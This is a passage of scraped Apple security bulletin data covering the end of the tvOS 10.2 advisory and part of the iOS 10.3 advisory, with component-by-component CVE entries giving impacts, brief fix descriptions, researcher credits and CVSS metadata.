(4th generation)\n\nImpact: Parsing a maliciously crafted font file may lead to an unexpected application termination or arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed through improved input validation.\n\nCVE-2017-2407: riusksk (\u6cc9\u54e5) of Tencent Security Platform Department\n\n**FontParser**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: Processing a maliciously crafted font may result in the disclosure of process memory\n\nDescription: An out-of-bounds read was addressed through improved input validation.\n\nCVE-2017-2439: John Villamil, Doyensec\n\n**HTTPProtocol**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: A malicious HTTP/2 server may be able to cause undefined behavior\n\nDescription: Multiple issues existed in nghttp2 before 1.17.0. 
These were addressed by updating nghttp2 to version 1.17.0.\n\nCVE-2017-2428\n\nEntry updated March 28, 2017\n\n**ImageIO**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: Processing a maliciously crafted image may lead to arbitrary code execution\n\nDescription: A memory corruption issue was addressed through improved input validation.\n\nCVE-2017-2416: Qidan He (\u4f55\u6dc7\u4e39, @flanker_hqd) of KeenLab, Tencent\n\n**ImageIO**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: Viewing a maliciously crafted JPEG file may lead to arbitrary code execution\n\nDescription: A memory corruption issue was addressed through improved input validation.\n\nCVE-2017-2432: an anonymous researcher working with Trend Micro's Zero Day Initiative\n\n**ImageIO**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: Processing a maliciously crafted file may lead to an unexpected application termination or arbitrary code execution\n\nDescription: A memory corruption issue was addressed through improved input validation.\n\nCVE-2017-2467\n\n**ImageIO**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: Processing a maliciously crafted image may lead to unexpected application termination\n\nDescription: An out-of-bound read existed in LibTIFF versions before 4.0.7. 
This was addressed by updating LibTIFF in ImageIO to version 4.0.7.\n\nCVE-2016-3619\n\n**JavaScriptCore**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: A use after free issue was addressed through improved memory management.\n\nCVE-2017-2491: Apple\n\nEntry added May 2, 2017\n\n**JavaScriptCore**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: Processing a maliciously crafted web page may lead to universal cross site scripting\n\nDescription: A prototype issue was addressed through improved logic.\n\nCVE-2017-2492: lokihardt of Google Project Zero\n\nEntry updated April 24, 2017\n\n**Kernel**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A memory corruption issue was addressed through improved input validation.\n\nCVE-2017-2401: Lufeng Li of Qihoo 360 Vulcan Team\n\n**Kernel**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: An integer overflow was addressed through improved input validation.\n\nCVE-2017-2440: an anonymous researcher\n\n**Kernel**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: A malicious application may be able to execute arbitrary code with root privileges\n\nDescription: A race condition was addressed through improved memory handling.\n\nCVE-2017-2456: lokihardt of Google Project Zero\n\n**Kernel**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A use after free issue was addressed through improved memory management.\n\nCVE-2017-2472: Ian Beer of Google Project Zero\n\n**Kernel**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: A malicious application may be able to execute arbitrary code with kernel privileges\n\nDescription: A 
memory corruption issue was addressed through improved input validation.\n\nCVE-2017-2473: Ian Beer of Google Project Zero\n\n**Kernel**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: An off-by-one issue was addressed through improved bounds checking.\n\nCVE-2017-2474: Ian Beer of Google Project Zero\n\n**Kernel**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A race condition was addressed through improved locking.\n\nCVE-2017-2478: Ian Beer of Google Project Zero\n\n**Kernel**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A buffer overflow issue was addressed through improved memory handling.\n\nCVE-2017-2482: Ian Beer of Google Project Zero\n\nCVE-2017-2483: Ian Beer of Google Project Zero\n\n**Kernel**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: An application may be able to execute arbitrary code with elevated privileges\n\nDescription: A memory corruption issue was addressed through improved memory handling.\n\nCVE-2017-2490: Ian Beer of Google Project Zero, The UK's National Cyber Security Centre (NCSC)\n\nEntry added March 31, 2017\n\n**Keyboards**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: An application may be able to execute arbitrary code\n\nDescription: A buffer overflow was addressed through improved bounds checking.\n\nCVE-2017-2458: Shashank (@cyberboyIndia)\n\n**Keychain**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: An attacker who is able to intercept TLS connections may be able to read secrets protected by iCloud Keychain.\n\nDescription: In certain circumstances, iCloud Keychain failed to validate the authenticity of OTR packets. 
This issue was addressed through improved validation.\n\nCVE-2017-2448: Alex Radocea of Longterm Security, Inc.\n\nEntry updated March 30, 2017\n\n**libarchive**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: A local attacker may be able to change file system permissions on arbitrary directories\n\nDescription: A validation issue existed in the handling of symlinks. This issue was addressed through improved validation of symlinks.\n\nCVE-2017-2390: Omer Medan of enSilo Ltd\n\n**libc++abi**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: Demangling a malicious C++ application may lead to arbitrary code execution\n\nDescription: A use after free issue was addressed through improved memory management.\n\nCVE-2017-2441\n\n**libxslt**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: Multiple vulnerabilities in libxslt\n\nDescription: Multiple memory corruption issues were addressed through improved memory handling.\n\nCVE-2017-5029: Holger Fuhrmannek\n\nEntry added March 28, 2017\n\n**Security**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: An application may be able to execute arbitrary code with root privileges\n\nDescription: A buffer overflow was addressed through improved bounds checking.\n\nCVE-2017-2451: Alex Radocea of Longterm Security, Inc.\n\n**Security**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: Processing a maliciously crafted x509 certificate may lead to arbitrary code execution\n\nDescription: A memory corruption issue existed in the parsing of certificates. 
This issue was addressed through improved input validation.\n\nCVE-2017-2485: Aleksandar Nikolic of Cisco Talos\n\n**WebKit**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: Processing maliciously crafted web content may exfiltrate data cross-origin\n\nDescription: A prototype access issue was addressed through improved exception handling.\n\nCVE-2017-2386: Andr\u00e9 Bargull\n\n**WebKit**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed through improved input validation.\n\nCVE-2017-2394: Apple\n\nCVE-2017-2396: Apple\n\nCVE-2016-9642: Gustavo Grieco\n\n**WebKit**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed through improved memory handling.\n\nCVE-2017-2395: Apple\n\nCVE-2017-2454: Ivan Fratric of Google Project Zero, Zheng Huang of the Baidu Security Lab working with Trend Micro's Zero Day Initiative\n\nCVE-2017-2455: Ivan Fratric of Google Project Zero\n\nCVE-2017-2459: Ivan Fratric of Google Project Zero\n\nCVE-2017-2460: Ivan Fratric of Google Project Zero\n\nCVE-2017-2464: Natalie Silvanovich of Google Project Zero, Jeonghoon Shin\n\nCVE-2017-2465: Zheng Huang and Wei Yuan of Baidu Security Lab\n\nCVE-2017-2466: Ivan Fratric of Google Project Zero\n\nCVE-2017-2468: lokihardt of Google Project Zero\n\nCVE-2017-2469: lokihardt of Google Project Zero\n\nCVE-2017-2470: lokihardt of Google Project Zero\n\nCVE-2017-2476: Ivan Fratric of Google Project Zero\n\nCVE-2017-2481: 0011 working with Trend Micro's Zero Day Initiative\n\nEntry updated June 20, 2017\n\n**WebKit**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: A type confusion issue was addressed 
through improved memory handling.\n\nCVE-2017-2415: Kai Kang of Tencent's Xuanwu Lab (tencent.com)\n\n**WebKit**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: Processing maliciously crafted web content may lead to high memory consumption\n\nDescription: An uncontrolled resource consumption issue was addressed through improved regex processing.\n\nCVE-2016-9643: Gustavo Grieco\n\n**WebKit**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: A malicious website may exfiltrate data cross-origin\n\nDescription: A validation issue existed in the handling of page loading. This issue was addressed through improved logic.\n\nCVE-2017-2367: lokihardt of Google Project Zero\n\n**WebKit**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: Processing maliciously crafted web content may lead to universal cross site scripting\n\nDescription: A logic issue existed in the handling of frame objects. This issue was addressed with improved state management.\n\nCVE-2017-2445: lokihardt of Google Project Zero\n\n**WebKit**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: A logic issue existed in the handling of strict mode functions. 
This issue was addressed with improved state management.\n\nCVE-2017-2446: Natalie Silvanovich of Google Project Zero\n\n**WebKit**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: Visiting a maliciously crafted website may compromise user information\n\nDescription: A memory corruption issue was addressed through improved memory handling.\n\nCVE-2017-2447: Natalie Silvanovich of Google Project Zero\n\n**WebKit**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed through improved memory handling.\n\nCVE-2017-2463: Kai Kang (4B5F5F4B) of Tencent's Xuanwu Lab (tencent.com) working with Trend Micro's Zero Day Initiative\n\nEntry added March 28, 2017\n\n**WebKit**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: Processing maliciously crafted web content may lead to universal cross site scripting\n\nDescription: A logic issue existed in frame handling. This issue was addressed through improved state management.\n\nCVE-2017-2475: lokihardt of Google Project Zero\n\n**WebKit**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: Processing maliciously crafted web content may exfiltrate data cross-origin\n\nDescription: A validation issue existed in element handling. This issue was addressed through improved validation.\n\nCVE-2017-2479: lokihardt of Google Project Zero\n\nEntry added March 28, 2017\n\n**WebKit**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: Processing maliciously crafted web content may exfiltrate data cross-origin\n\nDescription: A validation issue existed in element handling. 
This issue was addressed through improved validation.\n\nCVE-2017-2480: lokihardt of Google Project Zero\n\nCVE-2017-2493: lokihardt of Google Project Zero\n\nEntry updated April 24, 2017\n\n\n\n## Additional recognition\n\n**XNU**\n\nWe would like to acknowledge Lufeng Li of Qihoo 360 Vulcan Team for their assistance.\n", "edition": 3, "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-06-20T10:43:59", "title": "About the security content of tvOS 10.2 - Apple Support", "type": "apple", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-2430", "CVE-2016-9643", "CVE-2017-2479", "CVE-2017-2461", "CVE-2017-2480", "CVE-2017-2450", "CVE-2017-2492", "CVE-2017-2395", "CVE-2016-3619", "CVE-2017-2441", "CVE-2017-2444", "CVE-2017-2435", "CVE-2017-2439", "CVE-2017-2447", "CVE-2017-2459", "CVE-2017-2379", "CVE-2017-2454", "CVE-2017-2428", "CVE-2017-2483", "CVE-2017-2456", "CVE-2017-2485", "CVE-2017-2455", "CVE-2017-2470", "CVE-2017-2469", "CVE-2017-2464", "CVE-2017-2396", "CVE-2017-2451", "CVE-2017-2465", "CVE-2017-2406", "CVE-2017-2474", "CVE-2017-2446", "CVE-2017-2472", "CVE-2017-2475", "CVE-2017-2468", "CVE-2017-2390", 
"CVE-2017-2417", "CVE-2017-2462", "CVE-2017-2487", "CVE-2017-2491", "CVE-2017-5029", "CVE-2017-2482", "CVE-2017-2466", "CVE-2017-2458", "CVE-2017-2448", "CVE-2017-2401", "CVE-2017-2481", "CVE-2017-2467", "CVE-2016-9642", "CVE-2017-2415", "CVE-2017-2490", "CVE-2017-2407", "CVE-2017-2473", "CVE-2017-2416", "CVE-2017-2394", "CVE-2017-2367", "CVE-2017-2386", "CVE-2017-2460", "CVE-2017-2463", "CVE-2017-2493", "CVE-2017-2445", "CVE-2017-2440", "CVE-2017-2476", "CVE-2017-2432", "CVE-2017-2478"], "modified": "2017-06-20T10:43:59", "id": "APPLE:HT207601", "href": "https://support.apple.com/kb/HT207601", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-26T19:33:06", "description": "# About the security content of iOS 10.3\n\nThis document describes the security content of iOS 10.3.\n\n## About Apple security updates\n\nFor our customers' protection, Apple doesn't disclose, discuss, or confirm security issues until an investigation has occurred and patches or releases are available. Recent releases are listed on the [Apple security updates](<https://support.apple.com/kb/HT201222>) page.\n\nFor more information about security, see the [Apple Product Security](<https://support.apple.com/kb/HT201220>) page. 
You can encrypt communications with Apple using the [Apple Product Security PGP Key](<https://support.apple.com/kb/HT201601>).\n\nApple security documents reference vulnerabilities by [CVE-ID](<http://cve.mitre.org/about/>) when possible.\n\n\n\n## iOS 10.3\n\nReleased March 27, 2017\n\n**Accounts**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: A user may be able to view an Apple ID from the lock screen\n\nDescription: A prompt management issue was addressed by removing iCloud authentication prompts from the lock screen.\n\nCVE-2017-2397: Suprovici Vadim of UniApps team, an anonymous researcher\n\n**Audio**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Processing a maliciously crafted audio file may lead to arbitrary code execution\n\nDescription: A memory corruption issue was addressed through improved input validation.\n\nCVE-2017-2430: an anonymous researcher working with Trend Micro\u2019s Zero Day Initiative\n\nCVE-2017-2462: an anonymous researcher working with Trend Micro\u2019s Zero Day Initiative\n\n**Carbon**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Processing a maliciously crafted .dfont file may lead to arbitrary code execution\n\nDescription: A buffer overflow existed in the handling of font files. 
This issue was addressed through improved bounds checking.\n\nCVE-2017-2379: John Villamil, Doyensec, riusksk (\u6cc9\u54e5) of Tencent Security Platform Department\n\n**CoreGraphics**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Processing a maliciously crafted image may lead to a denial of service\n\nDescription: An infinite recursion was addressed through improved state management.\n\nCVE-2017-2417: riusksk (\u6cc9\u54e5) of Tencent Security Platform Department\n\n**CoreGraphics**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed through improved input validation.\n\nCVE-2017-2444: Mei Wang of 360 GearTeam\n\n**CoreText**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Processing a maliciously crafted font file may lead to arbitrary code execution\n\nDescription: A memory corruption issue was addressed through improved input validation.\n\nCVE-2017-2435: John Villamil, Doyensec\n\n**CoreText**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Processing a maliciously crafted font may result in the disclosure of process memory\n\nDescription: An out-of-bounds read was addressed through improved input validation.\n\nCVE-2017-2450: John Villamil, Doyensec\n\n**CoreText**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Processing a maliciously crafted text message may lead to application denial of service\n\nDescription: A resource exhaustion issue was addressed through improved input validation.\n\nCVE-2017-2461: Isaac Archambault of IDAoADI, an anonymous 
researcher\n\n**DataAccess**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Configuring an Exchange account with a mistyped email address may resolve to an unexpected server\n\nDescription: An input validation issue existed in the handling of Exchange email addresses. This issue was addressed through improved input validation.\n\nCVE-2017-2414: Ilya Nesterov and Maxim Goncharov\n\n**FontParser**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Processing a maliciously crafted font file may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed through improved input validation.\n\nCVE-2017-2487: riusksk (\u6cc9\u54e5) of Tencent Security Platform Department\n\nCVE-2017-2406: riusksk (\u6cc9\u54e5) of Tencent Security Platform Department\n\n**FontParser**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Parsing a maliciously crafted font file may lead to an unexpected application termination or arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed through improved input validation.\n\nCVE-2017-2407: riusksk (\u6cc9\u54e5) of Tencent Security Platform Department\n\n**FontParser**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Processing a maliciously crafted font may result in the disclosure of process memory\n\nDescription: An out-of-bounds read was addressed through improved input validation.\n\nCVE-2017-2439: John Villamil, Doyensec\n\n**HomeKit**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Home Control may unexpectedly appear on Control Center\n\nDescription: A state issue existed in the handling of Home Control. 
This issue was addressed through improved validation.\n\nCVE-2017-2434: Suyash Narain of India\n\n**HTTPProtocol**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: A malicious HTTP/2 server may be able to cause undefined behavior\n\nDescription: Multiple issues existed in nghttp2 before 1.17.0. These were addressed by updating nghttp2 to version 1.17.0.\n\nCVE-2017-2428\n\nEntry updated March 28, 2017\n\n**ImageIO**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Processing a maliciously crafted image may lead to arbitrary code execution\n\nDescription: A memory corruption issue was addressed through improved input validation.\n\nCVE-2017-2416: Qidan He (\u4f55\u6dc7\u4e39, @flanker_hqd) of KeenLab, Tencent\n\n**ImageIO**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Viewing a maliciously crafted JPEG file may lead to arbitrary code execution\n\nDescription: A memory corruption issue was addressed through improved input validation.\n\nCVE-2017-2432: an anonymous researcher working with Trend Micro's Zero Day Initiative\n\n**ImageIO**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Processing a maliciously crafted file may lead to an unexpected application termination or arbitrary code execution\n\nDescription: A memory corruption issue was addressed through improved input validation.\n\nCVE-2017-2467\n\n**ImageIO**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Processing a maliciously crafted image may lead to unexpected application termination\n\nDescription: An out-of-bound read existed in LibTIFF versions before 4.0.7. 
This was addressed by updating LibTIFF in ImageIO to version 4.0.7.\n\nCVE-2016-3619\n\n**iTunes Store**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: An attacker in a privileged network position may be able to tamper with iTunes network traffic\n\nDescription: Requests to iTunes sandbox web services were sent in cleartext. This was addressed by enabling HTTPS.\n\nCVE-2017-2412: Richard Shupak (linkedin.com/in/rshupak)\n\n**JavaScriptCore**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: A use after free issue was addressed through improved memory management.\n\nCVE-2017-2491: Apple\n\nEntry added May 2, 2017\n\n**JavaScriptCore**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Processing a maliciously crafted web page may lead to universal cross site scripting\n\nDescription: A prototype issue was addressed through improved logic.\n\nCVE-2017-2492: lokihardt of Google Project Zero\n\nEntry updated April 24, 2017\n\n**Kernel**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A memory corruption issue was addressed through improved input validation.\n\nCVE-2017-2398: Lufeng Li of Qihoo 360 Vulcan Team\n\nCVE-2017-2401: Lufeng Li of Qihoo 360 Vulcan Team\n\n**Kernel**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: An integer overflow was addressed through improved input validation.\n\nCVE-2017-2440: an anonymous researcher\n\n**Kernel**\n\nAvailable for: 
iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: A malicious application may be able to execute arbitrary code with root privileges\n\nDescription: A race condition was addressed through improved memory handling.\n\nCVE-2017-2456: lokihardt of Google Project Zero\n\n**Kernel**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A use after free issue was addressed through improved memory management.\n\nCVE-2017-2472: Ian Beer of Google Project Zero\n\n**Kernel**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: A malicious application may be able to execute arbitrary code with kernel privileges\n\nDescription: A memory corruption issue was addressed through improved input validation.\n\nCVE-2017-2473: Ian Beer of Google Project Zero\n\n**Kernel**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: An off-by-one issue was addressed through improved bounds checking.\n\nCVE-2017-2474: Ian Beer of Google Project Zero\n\n**Kernel**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A race condition was addressed through improved locking.\n\nCVE-2017-2478: Ian Beer of Google Project Zero\n\n**Kernel**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A buffer overflow issue was addressed through improved memory handling.\n\nCVE-2017-2482: Ian 
Beer of Google Project Zero\n\nCVE-2017-2483: Ian Beer of Google Project Zero\n\n**Kernel**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: An application may be able to execute arbitrary code with elevated privileges\n\nDescription: A memory corruption issue was addressed through improved memory handling.\n\nCVE-2017-2490: Ian Beer of Google Project Zero, The UK's National Cyber Security Centre (NCSC)\n\nEntry added March 31, 2017\n\n**Keyboards**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: An application may be able to execute arbitrary code\n\nDescription: A buffer overflow was addressed through improved bounds checking.\n\nCVE-2017-2458: Shashank (@cyberboyIndia)\n\n**Keychain**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: An attacker who is able to intercept TLS connections may be able to read secrets protected by iCloud Keychain.\n\nDescription: In certain circumstances, iCloud Keychain failed to validate the authenticity of OTR packets. This issue was addressed through improved validation.\n\nCVE-2017-2448: Alex Radocea of Longterm Security, Inc.\n\nEntry updated March 30, 2017\n\n**libarchive**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: A local attacker may be able to change file system permissions on arbitrary directories\n\nDescription: A validation issue existed in the handling of symlinks. 
This issue was addressed through improved validation of symlinks.\n\nCVE-2017-2390: Omer Medan of enSilo Ltd\n\n**libc++abi**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Demangling a malicious C++ application may lead to arbitrary code execution\n\nDescription: A use after free issue was addressed through improved memory management.\n\nCVE-2017-2441\n\n**libxslt**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Multiple vulnerabilities in libxslt\n\nDescription: Multiple memory corruption issues were addressed through improved memory handling.\n\nCVE-2017-5029: Holger Fuhrmannek\n\nEntry added March 28, 2017\n\n**Pasteboard**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: A person with physical access to an iOS device may read the pasteboard\n\nDescription: The pasteboard was encrypted with a key protected only by the hardware UID. This issue was addressed by encrypting the pasteboard with a key protected by the hardware UID and the user's passcode.\n\nCVE-2017-2399\n\n**Phone**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: A third party app can initiate a phone call without user interaction\n\nDescription: An issue existed in iOS allowing for calls without prompting. 
This issue was addressed by prompting a user to confirm call initiation.\n\nCVE-2017-2484\n\n**Profiles**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: An attacker may be able to exploit weaknesses in the DES cryptographic algorithm\n\nDescription: Support for the 3DES cryptographic algorithm was added to the SCEP client and DES was deprecated.\n\nCVE-2017-2380: an anonymous researcher\n\n**Quick Look**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Tapping a tel link in a PDF document could trigger a call without prompting the user\n\nDescription: An issue existed when checking the tel URL before initiating calls. This issue was addressed with the addition of a confirmation prompt.\n\nCVE-2017-2404: Tuan Anh Ngo (Melbourne, Australia), Christoph Nehring\n\n**Safari**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Visiting a malicious website may lead to address bar spoofing\n\nDescription: A state management issue was addressed by disabling text input until the destination page loads.\n\nCVE-2017-2376: an anonymous researcher, Michal Zalewski of Google Inc, Muneaki Nishimura (nishimunea) of Recruit Technologies Co., Ltd., Chris Hlady of Google Inc, an anonymous researcher, Yuyang Zhou of Tencent Security Platform Department (security.tencent.com)\n\n**Safari**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: A local user may be able to discover websites a user has visited in Private Browsing\n\nDescription: An issue existed in SQLite deletion. 
This issue was addressed through improved SQLite cleanup.\n\nCVE-2017-2384\n\n**Safari**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Processing maliciously crafted web content may present authentication sheets over arbitrary web sites\n\nDescription: A spoofing and denial-of-service issue existed in the handling of HTTP authentication. This issue was addressed through making HTTP authentication sheets non-modal.\n\nCVE-2017-2389: ShenYeYinJiu of Tencent Security Response Center, TSRC\n\n**Safari**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Visiting a malicious website by clicking a link may lead to user interface spoofing\n\nDescription: A spoofing issue existed in the handling of FaceTime prompts. This issue was addressed through improved input validation.\n\nCVE-2017-2453: xisigr of Tencent's Xuanwu Lab (tencent.com)\n\n**Safari Reader**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Enabling the Safari Reader feature on a maliciously crafted webpage may lead to universal cross site scripting\n\nDescription: Multiple validation issues were addressed through improved input sanitization.\n\nCVE-2017-2393: Erling Ellingsen\n\n**SafariViewController**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Cache state is not properly kept in sync between Safari and SafariViewController when a user clears Safari cache\n\nDescription: An issue existed in clearing Safari cache information from SafariViewController. 
This issue was addressed by improving cache state handling.\n\nCVE-2017-2400: Abhinav Bansal of Zscaler, Inc.\n\n**Sandbox Profiles**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, and iPod touch 6th generation\n\nImpact: A malicious application may be able to access the iCloud user record of a signed in user\n\nDescription: An access issue was addressed through additional sandbox restrictions on third party applications.\n\nCVE-2017-6976: George Dan (@theninjaprawn)\n\nEntry added August 1, 2017\n\n**Security**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Validating empty signatures with SecKeyRawVerify() may unexpectedly succeed\n\nDescription: A validation issue existed with cryptographic API calls. This issue was addressed through improved parameter validation.\n\nCVE-2017-2423: an anonymous researcher\n\n**Security**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: An application may be able to execute arbitrary code with root privileges\n\nDescription: A buffer overflow was addressed through improved bounds checking.\n\nCVE-2017-2451: Alex Radocea of Longterm Security, Inc.\n\n**Security**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Processing a maliciously crafted x509 certificate may lead to arbitrary code execution\n\nDescription: A memory corruption issue existed in the parsing of certificates. 
